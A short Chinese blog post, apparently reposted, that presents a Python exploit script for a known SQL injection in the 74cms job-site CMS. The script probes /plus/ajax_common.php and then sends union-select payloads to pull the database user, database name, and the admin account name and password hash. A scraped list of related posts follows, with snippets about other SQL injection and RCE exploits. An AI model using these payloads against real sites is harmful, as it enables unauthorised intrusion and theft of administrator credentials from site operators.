74cms 注入exp
遇到就瞎写了一个:
1 #!/usr/bin/env python 2 #encoding:utf-8 3 #by i3ekr 4 5 import requests,optparse,re 6 parse = optparse.OptionParser(usage="python %prog url") 7 parse.add_option('-u','--url',dest='url',metavar='urls',help='please input url!!!') 8 parse.set_defaults(v=1.2) 9 options,args=parse.parse_args() 10 url = options.url 11 12 13 def check(url): 14 payload = "/plus/ajax_common.php?query=0%27&act=hotword" 15 html = requests.get(url+payload).content 16 if "Query error" in html: 17 print """[+] 漏洞存在 18 [+] WooYun-2015-137002 19 [+] http://www.anquan.us/static/bugs/wooyun-2015-0137002.html 20 ------------------------------------------------------------- 21 """ 22 else: 23 print "[-] 漏洞不存在" 24 exit() 25 26 27 def attack(url): 28 user = requests.get(url+"/plus/ajax_common.php?query='+and+0+union+select+1,user(),3+and+'&act=hotword").content 29 print "[+] "+user 30 database = requests.get(url+"/plus/ajax_common.php?query='+and+0+union+select+1,database(),3+and+'&act=hotword").content 31 print "[+] "+database 32 username = requests.get(url+"/plus/ajax_common.php?query=0' union select 1,(select admin_name from qs_admin),3 and '&act=hotword").content 33 print "[+] "+username 34 password = requests.get(url+"/plus/ajax_common.php?query=0' union select 1,(select pwd from qs_admin),3 and '&act=hotword").content 35 print "[+] "+password 36 37 def ress(html): 38 res = r"\[\'(.*?)\'\]" 39 ok = re.findall(res,html)[0] 40 print ok 41 42 if __name__ == "__main__": 43 check(url) 44 attack(url)
转载于:https://www.cnblogs.com/nul1/p/9120264.html
74cms 注入exp相关推荐
- SQL注入 | exp()函数报错
0x01原理 当传递一个大于709的值时,函数exp()就会引起一个溢出错误. mysql> select exp(709); +-----------------------+ | exp(7 ...
- mysql sleep详解_sql注入详解(二)
sql注入详解 4.检测方法 首先是判断能不能进行sql注入 是哪种sql注入 (1)数字型 ?id=1 and 1=1 返回成功?id=1 and 1=2 返回失败 这说明是数字型注入,或者叫整型注 ...
- CTF-SQL注入入门题型
文章目录 参考 基础 截取 if条件语句加整数溢出进行盲注 DNS外传数据查询(data exfiltration through DNS channel) sql时间盲注 笛卡尔积 heavy qu ...
- x友GRP-u8 注入-RCE漏洞复现
用友GRP-u8 注入-RCE漏洞复现 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.漏洞复现 SQL注入POC ...
- sql注入详解 一文了解sql注入所有常见方法
前言 刷完了sqli-labs 对sql注入有了些许认识 在此做个小结与记录 1.什么是sql注入 sql,Structured Query Language,叫做结构化查询语言,管理数据库时用到的一 ...
- 用友u8 注入RCE漏洞利用数据
一.漏洞成因 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.用于SQL注入的POC POST /Proxy HTTP/1.1H ...
- 搞dedecms站 找后台的一些经验[转]
首先: 注入exp 有时候 有些 /plus/目录换成了 /plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIo ...
- 日常学习之总结(1机器学习,2jupyter notebook,3语言类,4快捷键,5操作系统,6密码学,7Web安全,8Kali,9正则表达式,10计算机网络,11编程题目)
本文以总结和归类别人的知识点为学习目标,如有侵权,联系本人,可以删除. 文章目录 第一章 机器学习 1.1 DataFrame 新增列的方法 1.2 推荐训练过程的系统 1.3 安全领域下的机器学习注 ...
- 渗透测试sec123笔记
1.外网打点 1.1端口探测 └─$ sudo masscan 192.168.1.103 -p 1-65535 --rate=100 masscan扫描结果 └─$ nmap -sV 192.168 ...
最新文章
- 要不是这本书及时出现,本周真撑不下去…
- 学python工资高吗-Python工资一般是多少 看完吓你一跳
- nodejs生成多层目录和生成文件的通用方法
- OpenCV最基本的测试代码-图像的读取与显示
- Android 实现简单的插件化模块化
- Andriod anim alpha中的属性介绍
- 云原生应用万节点分钟级分发协同实践
- Django从理论到实战(part55)--将网站上传到GitHub
- gateway 过滤器执行顺序_Gateway网关源码解析—路由(1.1)之RouteDefinitionLocator一览...
- 拼多多市值一夜蒸发759亿元,黄峥丝毫不慌...
- Asp.Net SignalR - 简单聊天室实现
- 以下创建了几个对象_面试题系列第2篇:new String()创建几个对象?
- 知识蒸馏 | 综述: 知识的类型
- Altium Designer19 生成Gerber文件方法
- 软考高级 真题 2015年下半年 信息系统项目管理师 案例分析
- Java定时任务调度框架
- 计算机维修兴趣小组,计算机兴趣小组章程
- python3d坐标系转换_世界坐标系,相机坐标系和图像坐标系的转换(Python)
- [滴滴校招]末尾0的个数
- Pixelmator for Mac如何使用抠..图的功能
热门文章
- oracle 半连接 效率,关于oracle中的半连接
- python 分析html_用python的BeautifulSoup分析html
- python类加载机制_PHP面向对象自动加载机制原理与用法分析
- liferay 学习网站 作者为 胡启稳
- 2020厦门大学845数据结构考研考试范围(大纲)和参考书目
- MySQL 8.0版本安装后,安装目录下找不到my.ini文件
- Learning to rank基本算法小结
- 使用Spark/Java读取已开启Kerberos认证的HBase
- python数据结构和算法3 栈、队列和排序
- 139.00.007 Git学习-Cheat Sheet